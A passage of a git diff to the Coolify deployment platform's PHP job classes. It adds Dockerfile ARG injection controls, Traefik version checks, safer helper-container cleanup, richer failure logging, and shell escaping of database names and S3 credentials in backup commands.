($envs as $env) { + if (data_get($env, 'is_multiline') === true) { + $argsToInsert->push("ARG {$env->key}"); + } else { + $argsToInsert->push("ARG {$env->key}={$env->real_value}"); + } + } + // Add Coolify variables as ARGs + if ($this->coolify_variables) { + $coolify_vars = collect(explode(' ', trim($this->coolify_variables))) + ->filter() + ->map(function ($var) { + return "ARG {$var}"; + }); + $argsToInsert = $argsToInsert->merge($coolify_vars); + } } else { - $this->execute_remote_command([ + // Only add preview environment variables that are available during build + $envs = $this->application->environment_variables_preview() + ->where('key', 'not like', 'NIXPACKS_%') + ->where('is_buildtime', true) + ->get(); + foreach ($envs as $env) { + if (data_get($env, 'is_multiline') === true) { + $argsToInsert->push("ARG {$env->key}"); + } else { + $argsToInsert->push("ARG {$env->key}={$env->real_value}"); + } + } + // Add Coolify variables as ARGs + if ($this->coolify_variables) { + $coolify_vars = collect(explode(' ', trim($this->coolify_variables))) + ->filter() + ->map(function ($var) { + return "ARG {$var}"; + }); + $argsToInsert = $argsToInsert->merge($coolify_vars); + } + } + + // Development logging to show what ARGs are being injected + if (isDev()) { + $this->application_deployment_queue->addLogEntry('[DEBUG] ========================================'); + $this->application_deployment_queue->addLogEntry('[DEBUG] Dockerfile ARG Injection'); + $this->application_deployment_queue->addLogEntry('[DEBUG] ========================================'); + $this->application_deployment_queue->addLogEntry('[DEBUG] ARGs to inject: '.$argsToInsert->count()); + foreach ($argsToInsert as $arg) { + // Only show ARG key, not the value (for security) + $argKey = str($arg)->after('ARG ')->before('=')->toString(); + $this->application_deployment_queue->addLogEntry("[DEBUG] - {$argKey}"); + } + } + + // Insert ARGs after each FROM instruction (in reverse order to maintain correct line numbers) + if ($argsToInsert->isNotEmpty()) { + foreach (array_reverse($fromLines) as $fromLineIndex) { + // Insert all ARGs after this FROM instruction + foreach ($argsToInsert->reverse() as $arg) { + $dockerfile->splice($fromLineIndex + 1, 0, [$arg]); + } + } + $envs_mapped = $envs->mapWithKeys(function ($env) { + return [$env->key => $env->real_value]; + }); + $secrets_hash = $this->generate_secrets_hash($envs_mapped); + $argsToInsert->push("ARG COOLIFY_BUILD_SECRETS_HASH={$secrets_hash}"); + } + + $dockerfile_base64 = base64_encode($dockerfile->implode("\n")); + $this->application_deployment_queue->addLogEntry('Final Dockerfile:', type: 'info', hidden: true); + $this->execute_remote_command( + [ + executeInDocker($this->deployment_uuid, "echo '{$dockerfile_base64}' | base64 -d | tee {$this->workdir}{$this->dockerfile_location} > /dev/null"), + 'hidden' => true, + ], + [ executeInDocker($this->deployment_uuid, "cat {$this->workdir}{$this->dockerfile_location}"), 'hidden' => true, - 'save' => 'dockerfile', 'ignore_errors' => true, ]); - $dockerfile = collect(str($this->saved_outputs->get('dockerfile'))->trim()->explode("\n")); - - // Find all FROM instruction positions - $fromLines = $this->findFromInstructionLines($dockerfile); - - // If no FROM instructions found, skip ARG insertion - if (empty($fromLines)) { - return; - } - - // Collect all ARG statements to insert - $argsToInsert = collect(); - - if ($this->pull_request_id === 0) { - // Only add environment variables that are available during build - $envs = $this->application->environment_variables() - ->where('key', 'not like', 'NIXPACKS_%') - ->where('is_buildtime', true) - ->get(); - foreach ($envs as $env) { - if (data_get($env, 'is_multiline') === true) { - $argsToInsert->push("ARG {$env->key}"); - } else { - $argsToInsert->push("ARG {$env->key}={$env->real_value}"); - } - } - // Add Coolify variables as ARGs - if ($this->coolify_variables) { - $coolify_vars = collect(explode(' ', trim($this->coolify_variables))) - ->filter() - ->map(function ($var) { - return "ARG {$var}"; - }); - $argsToInsert = $argsToInsert->merge($coolify_vars); - } - } else { - // Only add preview environment variables that are available during build - $envs = $this->application->environment_variables_preview() - ->where('key', 'not like', 'NIXPACKS_%') - ->where('is_buildtime', true) - ->get(); - foreach ($envs as $env) { - if (data_get($env, 'is_multiline') === true) { - $argsToInsert->push("ARG {$env->key}"); - } else { - $argsToInsert->push("ARG {$env->key}={$env->real_value}"); - } - } - // Add Coolify variables as ARGs - if ($this->coolify_variables) { - $coolify_vars = collect(explode(' ', trim($this->coolify_variables))) - ->filter() - ->map(function ($var) { - return "ARG {$var}"; - }); - $argsToInsert = $argsToInsert->merge($coolify_vars); - } - } - - // Insert ARGs after each FROM instruction (in reverse order to maintain correct line numbers) - if ($argsToInsert->isNotEmpty()) { - foreach (array_reverse($fromLines) as $fromLineIndex) { - // Insert all ARGs after this FROM instruction - foreach ($argsToInsert->reverse() as $arg) { - $dockerfile->splice($fromLineIndex + 1, 0, [$arg]); - } - } - $envs_mapped = $envs->mapWithKeys(function ($env) { - return [$env->key => $env->real_value]; - }); - $secrets_hash = $this->generate_secrets_hash($envs_mapped); - $argsToInsert->push("ARG COOLIFY_BUILD_SECRETS_HASH={$secrets_hash}"); - } - - $dockerfile_base64 = base64_encode($dockerfile->implode("\n")); - $this->application_deployment_queue->addLogEntry('Final Dockerfile:', type: 'info', hidden: true); - $this->execute_remote_command( - [ - executeInDocker($this->deployment_uuid, "echo '{$dockerfile_base64}' | base64 -d | tee {$this->workdir}{$this->dockerfile_location} > /dev/null"), - 'hidden' => true, - ], - [ - executeInDocker($this->deployment_uuid, "cat {$this->workdir}{$this->dockerfile_location}"), - 'hidden' => true, - 'ignore_errors' => true, - ]); - } } private function modify_dockerfile_for_secrets($dockerfile_path) @@ -3410,6 +3546,13 @@ private function modify_dockerfiles_for_compose($composeFile) return; } + // Skip ARG injection if disabled by user - preserves Docker build cache + if ($this->application->settings->inject_build_args_to_dockerfile === false) { + $this->application_deployment_queue->addLogEntry('Skipping Docker Compose Dockerfile ARG injection (disabled in settings).', hidden: true); + + return; + } + // Generate env variables if not already done // This populates $this->env_args with both user-defined and COOLIFY_* variables if (! $this->env_args || $this->env_args->isEmpty()) { @@ -3500,6 +3643,18 @@ private function modify_dockerfiles_for_compose($composeFile) continue; } + // Development logging to show what ARGs are being injected for Docker Compose + if (isDev()) { + $this->application_deployment_queue->addLogEntry('[DEBUG] ========================================'); + $this->application_deployment_queue->addLogEntry("[DEBUG] Docker Compose ARG Injection - Service: {$serviceName}"); + $this->application_deployment_queue->addLogEntry('[DEBUG] ========================================'); + $this->application_deployment_queue->addLogEntry('[DEBUG] ARGs to inject: '.$argsToAdd->count()); + foreach ($argsToAdd as $arg) { + $argKey = str($arg)->after('ARG ')->toString(); + $this->application_deployment_queue->addLogEntry("[DEBUG] - {$argKey}"); + } + } + $totalAdded = 0; $offset = 0; @@ -3637,7 +3792,7 @@ private function run_pre_deployment_command() return; } } - throw new RuntimeException('Pre-deployment command: Could not find a valid container. Is the container name correct?'); + throw new DeploymentException('Pre-deployment command: Could not find a valid container. Is the container name correct?'); } private function run_post_deployment_command() @@ -3673,7 +3828,7 @@ private function run_post_deployment_command() return; } } - throw new RuntimeException('Post-deployment command: Could not find a valid container. Is the container name correct?'); + throw new DeploymentException('Post-deployment command: Could not find a valid container. Is the container name correct?'); } /** @@ -3684,7 +3839,7 @@ private function checkForCancellation(): void $this->application_deployment_queue->refresh(); if ($this->application_deployment_queue->status === ApplicationDeploymentStatus::CANCELLED_BY_USER->value) { $this->application_deployment_queue->addLogEntry('Deployment cancelled by user, stopping execution.'); - throw new \RuntimeException('Deployment cancelled by user', 69420); + throw new DeploymentException('Deployment cancelled by user', 69420); } } @@ -3717,7 +3872,7 @@ private function isInTerminalState(): bool if ($this->application_deployment_queue->status === ApplicationDeploymentStatus::CANCELLED_BY_USER->value) { $this->application_deployment_queue->addLogEntry('Deployment cancelled by user, stopping execution.'); - throw new \RuntimeException('Deployment cancelled by user', 69420); + throw new DeploymentException('Deployment cancelled by user', 69420); } return false; @@ -3790,7 +3945,7 @@ private function completeDeployment(): void * Fail the deployment. * Sends failure notification and queues next deployment. */ - private function failDeployment(): void + protected function failDeployment(): void { $this->transitionToStatus(ApplicationDeploymentStatus::FAILED); } @@ -3798,11 +3953,39 @@ private function failDeployment(): void public function failed(Throwable $exception): void { $this->failDeployment(); - $this->application_deployment_queue->addLogEntry('Oops something is not okay, are you okay? 😢', 'stderr'); - if (str($exception->getMessage())->isNotEmpty()) { - $this->application_deployment_queue->addLogEntry($exception->getMessage(), 'stderr'); + + // Log comprehensive error information + $errorMessage = $exception->getMessage() ?: 'Unknown error occurred'; + $errorCode = $exception->getCode(); + $errorClass = get_class($exception); + + $this->application_deployment_queue->addLogEntry('========================================', 'stderr'); + $this->application_deployment_queue->addLogEntry("Deployment failed: {$errorMessage}", 'stderr'); + $this->application_deployment_queue->addLogEntry("Error type: {$errorClass}", 'stderr', hidden: true); + $this->application_deployment_queue->addLogEntry("Error code: {$errorCode}", 'stderr', hidden: true); + + // Log the exception file and line for debugging + $this->application_deployment_queue->addLogEntry("Location: {$exception->getFile()}:{$exception->getLine()}", 'stderr', hidden: true); + + // Log previous exceptions if they exist (for chained exceptions) + $previous = $exception->getPrevious(); + if ($previous) { + $this->application_deployment_queue->addLogEntry('Caused by:', 'stderr', hidden: true); + $previousMessage = $previous->getMessage() ?: 'No message'; + $previousClass = get_class($previous); + $this->application_deployment_queue->addLogEntry(" {$previousClass}: {$previousMessage}", 'stderr', hidden: true); + $this->application_deployment_queue->addLogEntry(" at {$previous->getFile()}:{$previous->getLine()}", 'stderr', hidden: true); } + // Log first few lines of stack trace for debugging + $trace = $exception->getTraceAsString(); + $traceLines = explode("\n", $trace); + $this->application_deployment_queue->addLogEntry('Stack trace (first 5 lines):', 'stderr', hidden: true); + foreach (array_slice($traceLines, 0, 5) as $traceLine) { + $this->application_deployment_queue->addLogEntry(" {$traceLine}", 'stderr', hidden: true); + } + $this->application_deployment_queue->addLogEntry('========================================', 'stderr'); + if ($this->application->build_pack !== 'dockercompose') { $code = $exception->getCode(); if ($code !== 69420) { diff --git a/app/Jobs/CheckForUpdatesJob.php b/app/Jobs/CheckForUpdatesJob.php index 1d3a345e1..4f2bfa68c 100644 --- a/app/Jobs/CheckForUpdatesJob.php +++ b/app/Jobs/CheckForUpdatesJob.php @@ -33,6 +33,9 @@ public function handle(): void // New version available $settings->update(['new_version_available' => true]); File::put(base_path('versions.json'), json_encode($versions, JSON_PRETTY_PRINT)); + + // Invalidate cache to ensure fresh data is loaded + invalidate_versions_cache(); } else { $settings->update(['new_version_available' => false]); } diff --git a/app/Jobs/CheckTraefikVersionForServerJob.php b/app/Jobs/CheckTraefikVersionForServerJob.php new file mode 100644 index 000000000..88484bcce --- /dev/null +++ b/app/Jobs/CheckTraefikVersionForServerJob.php @@ -0,0 +1,173 @@ +server); + + // Update detected version in database + $this->server->update(['detected_traefik_version' => $currentVersion]); + + if (! $currentVersion) { + return; + } + + // Check if image tag is 'latest' by inspecting the image (makes SSH call) + $imageTag = instant_remote_process([ + "docker inspect coolify-proxy --format '{{.Config.Image}}' 2>/dev/null", + ], $this->server, false); + + // Handle empty/null response from SSH command + if (empty(trim($imageTag))) { + return; + } + + if (str_contains(strtolower(trim($imageTag)), ':latest')) { + return; + } + + // Parse current version to extract major.minor.patch + $current = ltrim($currentVersion, 'v'); + if (! preg_match('/^(\d+\.\d+)\.(\d+)$/', $current, $matches)) { + return; + } + + $currentBranch = $matches[1]; // e.g., "3.6" + + // Find the latest version for this branch + $latestForBranch = $this->traefikVersions["v{$currentBranch}"] ?? null; + + if (! $latestForBranch) { + // User is on a branch we don't track - check if newer branches exist + $newerBranchInfo = $this->getNewerBranchInfo($currentBranch); + + if ($newerBranchInfo) { + $this->storeOutdatedInfo($current, $newerBranchInfo['latest'], 'minor_upgrade', $newerBranchInfo['target']); + } else { + // No newer branch found, clear outdated info + $this->server->update(['traefik_outdated_info' => null]); + } + + return; + } + + // Compare patch version within the same branch + $latest = ltrim($latestForBranch, 'v'); + + // Always check for newer branches first + $newerBranchInfo = $this->getNewerBranchInfo($currentBranch); + + if (version_compare($current, $latest, '<')) { + // Patch update available + $this->storeOutdatedInfo($current, $latest, 'patch_update', null, $newerBranchInfo); + } elseif ($newerBranchInfo) { + // Only newer branch available (no patch update) + $this->storeOutdatedInfo($current, $newerBranchInfo['latest'], 'minor_upgrade', $newerBranchInfo['target']); + } else { + // Fully up to date + $this->server->update(['traefik_outdated_info' => null]); + } + } + + /** + * Get information about newer branches if available. + */ + private function getNewerBranchInfo(string $currentBranch): ?array + { + $newestBranch = null; + $newestVersion = null; + + foreach ($this->traefikVersions as $branch => $version) { + $branchNum = ltrim($branch, 'v'); + if (version_compare($branchNum, $currentBranch, '>')) { + if (! $newestVersion || version_compare($version, $newestVersion, '>')) { + $newestBranch = $branchNum; + $newestVersion = $version; + } + } + } + + if ($newestVersion) { + return [ + 'target' => "v{$newestBranch}", + 'latest' => ltrim($newestVersion, 'v'), + ]; + } + + return null; + } + + /** + * Store outdated information in database and send immediate notification. + */ + private function storeOutdatedInfo(string $current, string $latest, string $type, ?string $upgradeTarget = null, ?array $newerBranchInfo = null): void + { + $outdatedInfo = [ + 'current' => $current, + 'latest' => $latest, + 'type' => $type, + 'checked_at' => now()->toIso8601String(), + ]; + + // For minor upgrades, add the upgrade_target field (e.g., "v3.6") + if ($type === 'minor_upgrade' && $upgradeTarget) { + $outdatedInfo['upgrade_target'] = $upgradeTarget; + } + + // If there's a newer branch available (even for patch updates), include that info + if ($newerBranchInfo) { + $outdatedInfo['newer_branch_target'] = $newerBranchInfo['target']; + $outdatedInfo['newer_branch_latest'] = $newerBranchInfo['latest']; + } + + $this->server->update(['traefik_outdated_info' => $outdatedInfo]); + + // Send immediate notification to the team + $this->sendNotification($outdatedInfo); + } + + /** + * Send notification to team about outdated Traefik. + */ + private function sendNotification(array $outdatedInfo): void + { + // Attach the outdated info as a dynamic property for the notification + $this->server->outdatedInfo = $outdatedInfo; + + // Get the team and send notification + $team = $this->server->team()->first(); + + if ($team) { + $team->notify(new TraefikVersionOutdated(collect([$this->server]))); + } + } +} diff --git a/app/Jobs/CheckTraefikVersionJob.php b/app/Jobs/CheckTraefikVersionJob.php new file mode 100644 index 000000000..a513f280e --- /dev/null +++ b/app/Jobs/CheckTraefikVersionJob.php @@ -0,0 +1,45 @@ +whereProxyType(ProxyTypes::TRAEFIK->value) + ->whereRelation('settings', 'is_reachable', true) + ->whereRelation('settings', 'is_usable', true) + ->get(); + + if ($servers->isEmpty()) { + return; + } + + // Dispatch individual server check jobs in parallel + // Each job will send immediate notifications when outdated Traefik is detected + foreach ($servers as $server) { + CheckTraefikVersionForServerJob::dispatch($server, $traefikVersions); + } + } +} diff --git a/app/Jobs/CleanupHelperContainersJob.php b/app/Jobs/CleanupHelperContainersJob.php index c82a27ce9..f6f5e8b5b 100644 --- a/app/Jobs/CleanupHelperContainersJob.php +++ b/app/Jobs/CleanupHelperContainersJob.php @@ -2,6 +2,8 @@ namespace App\Jobs; +use App\Enums\ApplicationDeploymentStatus; +use App\Models\ApplicationDeploymentQueue; use App\Models\Server; use Illuminate\Bus\Queueable; use Illuminate\Contracts\Queue\ShouldBeEncrypted; @@ -20,10 +22,51 @@ public function __construct(public Server $server) {} public function handle(): void { try { + // Get all active deployments on this server + $activeDeployments = ApplicationDeploymentQueue::where('server_id', $this->server->id) + ->whereIn('status', [ + ApplicationDeploymentStatus::IN_PROGRESS->value, + ApplicationDeploymentStatus::QUEUED->value, + ]) + ->pluck('deployment_uuid') + ->toArray(); + + \Log::info('CleanupHelperContainersJob - Active deployments', [ + 'server' => $this->server->name, + 'active_deployment_uuids' => $activeDeployments, + ]); + $containers = instant_remote_process_with_timeout(['docker container ps --format \'{{json .}}\' | jq -s \'map(select(.Image | contains("'.config('constants.coolify.registry_url').'/coollabsio/coolify-helper")))\''], $this->server, false); - $containerIds = collect(json_decode($containers))->pluck('ID'); - if ($containerIds->count() > 0) { - foreach ($containerIds as $containerId) { + $helperContainers = collect(json_decode($containers)); + + if ($helperContainers->count() > 0) { + foreach ($helperContainers as $container) { + $containerId = data_get($container, 'ID'); + $containerName = data_get($container, 'Names'); + + // Check if this container belongs to an active deployment + $isActiveDeployment = false; + foreach ($activeDeployments as $deploymentUuid) { + if (str_contains($containerName, $deploymentUuid)) { + $isActiveDeployment = true; + break; + } + } + + if ($isActiveDeployment) { + \Log::info('CleanupHelperContainersJob - Skipping active deployment container', [ + 'container' => $containerName, + 'id' => $containerId, + ]); + + continue; + } + + \Log::info('CleanupHelperContainersJob - Removing orphaned helper container', [ + 'container' => $containerName, + 'id' => $containerId, + ]); + instant_remote_process_with_timeout(['docker container rm -f '.$containerId], $this->server, false); } } diff --git a/app/Jobs/CoolifyTask.php b/app/Jobs/CoolifyTask.php index 49a5ba8dd..ce535e036 100755 --- a/app/Jobs/CoolifyTask.php +++ b/app/Jobs/CoolifyTask.php @@ -3,18 +3,35 @@ namespace App\Jobs; use App\Actions\CoolifyTask\RunRemoteProcess; +use App\Enums\ProcessStatus; use Illuminate\Bus\Queueable; use Illuminate\Contracts\Queue\ShouldBeEncrypted; use Illuminate\Contracts\Queue\ShouldQueue; use Illuminate\Foundation\Bus\Dispatchable; use Illuminate\Queue\InteractsWithQueue; use Illuminate\Queue\SerializesModels; +use Illuminate\Support\Facades\Log; use Spatie\Activitylog\Models\Activity; class CoolifyTask implements ShouldBeEncrypted, ShouldQueue { use Dispatchable, InteractsWithQueue, Queueable, SerializesModels; + /** + * The number of times the job may be attempted. + */ + public $tries = 3; + + /** + * The maximum number of unhandled exceptions to allow before failing. + */ + public $maxExceptions = 1; + + /** + * The number of seconds the job can run before timing out. + */ + public $timeout = 600; + /** * Create a new job instance. */ @@ -42,4 +59,53 @@ public function handle(): void $remote_process(); } + + /** + * Calculate the number of seconds to wait before retrying the job. + */ + public function backoff(): array + { + return [30, 90, 180]; // 30s, 90s, 180s between retries + } + + /** + * Handle a job failure. + */ + public function failed(?\Throwable $exception): void + { + Log::channel('scheduled-errors')->error('CoolifyTask permanently failed', [ + 'job' => 'CoolifyTask', + 'activity_id' => $this->activity->id, + 'server_uuid' => $this->activity->getExtraProperty('server_uuid'), + 'command_preview' => substr($this->activity->getExtraProperty('command') ?? '', 0, 200), + 'error' => $exception?->getMessage(), + 'total_attempts' => $this->attempts(), + 'trace' => $exception?->getTraceAsString(), + ]); + + // Update activity status to reflect permanent failure + $this->activity->properties = $this->activity->properties->merge([ + 'status' => ProcessStatus::ERROR->value, + 'error' => $exception?->getMessage() ?? 'Job permanently failed', + 'failed_at' => now()->toIso8601String(), + ]); + $this->activity->save(); + + // Dispatch cleanup event on failure (same as on success) + if ($this->call_event_on_finish) { + try { + $eventClass = "App\\Events\\$this->call_event_on_finish"; + if (! is_null($this->call_event_data)) { + event(new $eventClass($this->call_event_data)); + } else { + event(new $eventClass($this->activity->causer_id)); + } + Log::info('Cleanup event dispatched after job failure', [ + 'event' => $this->call_event_on_finish, + ]); + } catch (\Throwable $e) { + Log::error('Error dispatching cleanup event on failure: '.$e->getMessage()); + } + } + } } diff --git a/app/Jobs/DatabaseBackupJob.php b/app/Jobs/DatabaseBackupJob.php index 45586f0d0..6917de6d5 100644 --- a/app/Jobs/DatabaseBackupJob.php +++ b/app/Jobs/DatabaseBackupJob.php @@ -23,6 +23,7 @@ use Illuminate\Foundation\Bus\Dispatchable; use Illuminate\Queue\InteractsWithQueue; use Illuminate\Queue\SerializesModels; +use Illuminate\Support\Facades\Log; use Illuminate\Support\Str; use Throwable; use Visus\Cuid2\Cuid2; @@ -31,6 +32,8 @@ class DatabaseBackupJob implements ShouldBeEncrypted, ShouldQueue { use Dispatchable, InteractsWithQueue, Queueable, SerializesModels; + public $maxExceptions = 1; + public ?Team $team = null; public Server $server; @@ -74,7 +77,7 @@ class DatabaseBackupJob implements ShouldBeEncrypted, ShouldQueue public function __construct(public ScheduledDatabaseBackup $backup) { $this->onQueue('high'); - $this->timeout = $backup->timeout; + $this->timeout = $backup->timeout ?? 3600; } public function handle(): void @@ -486,17 +489,22 @@ private function backup_standalone_mongodb(string $databaseWithCollections): voi $collectionsToExclude = collect(); } $commands[] = 'mkdir -p '.$this->backup_dir; + + // Validate and escape database name to prevent command injection + validateShellSafePath($databaseName, 'database name'); + $escapedDatabaseName = escapeshellarg($databaseName); + if ($collectionsToExclude->count() === 0) { if (str($this->database->image)->startsWith('mongo:4')) { $commands[] = "docker exec $this->container_name mongodump --uri=\"$url\" --gzip --archive > $this->backup_location"; } else { - $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $databaseName --gzip --archive > $this->backup_location"; + $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $escapedDatabaseName --gzip --archive > $this->backup_location"; } } else { if (str($this->database->image)->startsWith('mongo:4')) { $commands[] = "docker exec $this->container_name mongodump --uri=$url --gzip --excludeCollection ".$collectionsToExclude->implode(' --excludeCollection ')." --archive > $this->backup_location"; } else { - $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $databaseName --gzip --excludeCollection ".$collectionsToExclude->implode(' --excludeCollection ')." --archive > $this->backup_location"; + $commands[] = "docker exec $this->container_name mongodump --authenticationDatabase=admin --uri=\"$url\" --db $escapedDatabaseName --gzip --excludeCollection ".$collectionsToExclude->implode(' --excludeCollection ')." --archive > $this->backup_location"; } } } @@ -522,7 +530,10 @@ private function backup_standalone_postgresql(string $database): void if ($this->backup->dump_all) { $backupCommand .= " $this->container_name pg_dumpall --username {$this->database->postgres_user} | gzip > $this->backup_location"; } else { - $backupCommand .= " $this->container_name pg_dump --format=custom --no-acl --no-owner --username {$this->database->postgres_user} $database > $this->backup_location"; + // Validate and escape database name to prevent command injection + validateShellSafePath($database, 'database name'); + $escapedDatabase = escapeshellarg($database); + $backupCommand .= " $this->container_name pg_dump --format=custom --no-acl --no-owner --username {$this->database->postgres_user} $escapedDatabase > $this->backup_location"; } $commands[] = $backupCommand; @@ -544,7 +555,10 @@ private function backup_standalone_mysql(string $database): void if ($this->backup->dump_all) { $commands[] = "docker exec $this->container_name mysqldump -u root -p\"{$this->database->mysql_root_password}\" --all-databases --single-transaction --quick --lock-tables=false --compress | gzip > $this->backup_location"; } else { - $commands[] = "docker exec $this->container_name mysqldump -u root -p\"{$this->database->mysql_root_password}\" $database > $this->backup_location"; + // Validate and escape database name to prevent command injection + validateShellSafePath($database, 'database name'); + $escapedDatabase = escapeshellarg($database); + $commands[] = "docker exec $this->container_name mysqldump -u root -p\"{$this->database->mysql_root_password}\" $escapedDatabase > $this->backup_location"; } $this->backup_output = instant_remote_process($commands, $this->server); $this->backup_output = trim($this->backup_output); @@ -564,7 +578,10 @@ private function backup_standalone_mariadb(string $database): void if ($this->backup->dump_all) { $commands[] = "docker exec $this->container_name mariadb-dump -u root -p\"{$this->database->mariadb_root_password}\" --all-databases --single-transaction --quick --lock-tables=false --compress > $this->backup_location"; } else { - $commands[] = "docker exec $this->container_name mariadb-dump -u root -p\"{$this->database->mariadb_root_password}\" $database > $this->backup_location"; + // Validate and escape database name to prevent command injection + validateShellSafePath($database, 'database name'); + $escapedDatabase = escapeshellarg($database); + $commands[] = "docker exec $this->container_name mariadb-dump -u root -p\"{$this->database->mariadb_root_password}\" $escapedDatabase > $this->backup_location"; } $this->backup_output = instant_remote_process($commands, $this->server); $this->backup_output = trim($this->backup_output); @@ -636,7 +653,13 @@ private function upload_to_s3(): void } else { $commands[] = "docker run -d --network {$network} --name backup-of-{$this->backup_log_uuid} --rm -v $this->backup_location:$this->backup_location:ro {$fullImageName}"; } - $commands[] = "docker exec backup-of-{$this->backup_log_uuid} mc alias set temporary {$endpoint} {$key} \"{$secret}\""; + + // Escape S3 credentials to prevent command injection + $escapedEndpoint = escapeshellarg($endpoint); + $escapedKey = escapeshellarg($key); + $escapedSecret = escapeshellarg($secret); + + $commands[] = "docker exec backup-of-{$this->backup_log_uuid} mc alias set temporary {$escapedEndpoint} {$escapedKey} {$escapedSecret}"; $commands[] = "docker exec backup-of-{$this->backup_log_uuid} mc cp $this->backup_location temporary/$bucket{$this->backup_dir}/"; instant_remote_process($commands, $this->server); @@ -661,15 +684,34 @@ private function getFullImageName(): string public function failed(?Throwable $exception): void { + Log::channel('scheduled-errors')->error('DatabaseBackup permanently failed', [ + 'job' => 'DatabaseBackupJob', + 'backup_id' => $this->backup->uuid, + 'database' => $this->database?->name ?? 'unknown', + 'database_type' => get_class($this->database ?? new \stdClass), + 'server' => $this->server?->name ?? 'unknown', + 'total_attempts' => $this->attempts(), + 'error' => $exception?->getMessage(), + 'trace' => $exception?->getTraceAsString(), + ]); + $log = ScheduledDatabaseBackupExecution::where('uuid', $this->backup_log_uuid)->first(); if ($log) { $log->update([ 'status' => 'failed', - 'message' => 'Job failed: '.($exception?->getMessage() ?? 'Unknown error'), + 'message' => 'Job permanently failed after '.$this->attempts().' attempts: '.($exception?->getMessage() ?? 'Unknown error'), 'size' => 0, 'filename' => null, + 'finished_at' => Carbon::now(), ]); } + + // Notify team about permanent failure + if ($this->team) { + $databaseName = $log?->database_name ?? 'unknown'; + $output = $this->backup_output ?? $exception?->getMessage() ?? 'Unknown error'; + $this->team->notify(new BackupFailed($this->backup, $this->database, $output, $databaseName)); + } } } diff --git a/app/Jobs/DeleteResourceJob.php b/app/Jobs/DeleteResourceJob.php index 45f113d96..825604910 100644 --- a/app/Jobs/DeleteResourceJob.php +++ b/app/Jobs/DeleteResourceJob.php @@ -124,16 +124,54 @@ private function deleteApplicationPreview() $this->resource->delete(); } + // Cancel any active deployments for this PR (same logic as API cancel_deployment) + $activeDeployments = \App\Models\ApplicationDeploymentQueue::where('application_id', $application->id) + ->where('pull_request_id', $pull_request_id) + ->whereIn('status', [ + \App\Enums\ApplicationDeploymentStatus::QUEUED->value, + \App\Enums\ApplicationDeploymentStatus::IN_PROGRESS->value, + ]) + ->get(); + + foreach ($activeDeployments as $activeDeployment) { + try { + // Mark deployment as cancelled + $activeDeployment->update([ + 'status' => \App\Enums\ApplicationDeploymentStatus::CANCELLED_BY_USER->value, + ]); + + // Add cancellation log entry + $activeDeployment->addLogEntry('Deployment cancelled: Pull request closed.', 'stderr'); + + // Check if helper container exists and kill it + $deployment_uuid = $activeDeployment->deployment_uuid; + $escapedDeploymentUuid = escapeshellarg($deployment_uuid); + $checkCommand = "docker ps -a --filter name={$escapedDeploymentUuid} --format '{{.Names}}'"; + $containerExists = instant_remote_process([$checkCommand], $server); + + if ($containerExists && str($containerExists)->trim()->isNotEmpty()) { + instant_remote_process(["docker rm -f {$escapedDeploymentUuid}"], $server); + $activeDeployment->addLogEntry('Deployment container stopped.'); + } else { + $activeDeployment->addLogEntry('Helper container not yet started. Deployment will be cancelled when job checks status.'); + } + + } catch (\Throwable $e) { + // Silently handle errors during deployment cancellation + } + } + try { if ($server->isSwarm()) { - instant_remote_process(["docker stack rm {$application->uuid}-{$pull_request_id}"], $server); + $escapedStackName = escapeshellarg("{$application->uuid}-{$pull_request_id}"); + instant_remote_process(["docker stack rm {$escapedStackName}"], $server); } else { $containers = getCurrentApplicationContainerStatus($server, $application->id, $pull_request_id)->toArray(); $this->stopPreviewContainers($containers, $server); } } catch (\Throwable $e) { // Log the error but don't fail the job - ray('Error stopping preview containers: '.$e->getMessage()); + \Log::warning('Error stopping preview containers for application '.$application->uuid.', PR #'.$pull_request_id.': '.$e->getMessage()); } // Finally, force delete to trigger resource cleanup @@ -156,7 +194,6 @@ private function stopPreviewContainers(array $containers, $server, int $timeout "docker stop -t $timeout $containerList", "docker rm -f $containerList", ]; - instant_remote_process( command: $commands, server: $server, diff --git a/app/Jobs/PullHelperImageJob.php b/app/Jobs/PullHelperImageJob.php deleted file mode 100644 index 7cdf1b81a..000000000 --- a/app/Jobs/PullHelperImageJob.php +++ /dev/null @@ -1,30 +0,0 @@ -onQueue('high'); - } - - public function handle(): void - { - $helperImage = config('constants.coolify.helper_image'); - $latest_version = getHelperVersion(); - instant_remote_process(["docker pull -q {$helperImage}:{$latest_version}"], $this->server, false); - } -} diff --git a/app/Jobs/PushServerUpdateJob.php b/app/Jobs/PushServerUpdateJob.php index 7726c2c73..9d44e08f9 100644 --- a/app/Jobs/PushServerUpdateJob.php +++ b/app/Jobs/PushServerUpdateJob.php @@ -13,6 +13,8 @@ use App\Models\ServiceApplication; use App\Models\ServiceDatabase; use App\Notifications\Container\ContainerRestarted; +use App\Services\ContainerStatusAggregator; +use App\Traits\CalculatesExcludedStatus; use Illuminate\Bus\Queueable; use Illuminate\Contracts\Queue\ShouldBeEncrypted; use Illuminate\Contracts\Queue\ShouldQueue; @@ -25,6 +27,7 @@ class PushServerUpdateJob implements ShouldBeEncrypted, ShouldQueue, Silenced { + use CalculatesExcludedStatus; use Dispatchable, InteractsWithQueue, Queueable, SerializesModels; public $tries = 1; @@ -67,6 +70,8 @@ class PushServerUpdateJob implements ShouldBeEncrypted, ShouldQueue, Silenced public Collection $applicationContainerStatuses; + public Collection $serviceContainerStatuses; + public bool $foundProxy = false; public bool $foundLogDrainContainer = false; @@ -90,6 +95,7 @@ public function __construct(public Server $server, public $data) $this->foundApplicationPreviewsIds = collect(); $this->foundServiceDatabaseIds = collect(); $this->applicationContainerStatuses = collect(); + $this->serviceContainerStatuses = collect(); $this->allApplicationIds = collect(); $this->allDatabaseUuids = collect(); $this->allTcpProxyUuids = collect(); @@ -99,6 +105,20 @@ public function __construct(public Server $server, public $data) public function handle() { + // Defensive initialization for Collection properties to handle queue deserialization edge cases + $this->serviceContainerStatuses ??= collect(); + $this->applicationContainerStatuses ??= collect(); + $this->foundApplicationIds ??= collect(); + $this->foundDatabaseUuids ??= collect(); + $this->foundServiceApplicationIds ??= collect(); + $this->foundApplicationPreviewsIds ??= collect(); + $this->foundServiceDatabaseIds ??= collect(); + $this->allApplicationIds ??= collect(); + $this->allDatabaseUuids ??= collect(); + $this->allTcpProxyUuids ??= collect(); + $this->allServiceApplicationIds ??= collect(); + $this->allServiceDatabaseIds ??= 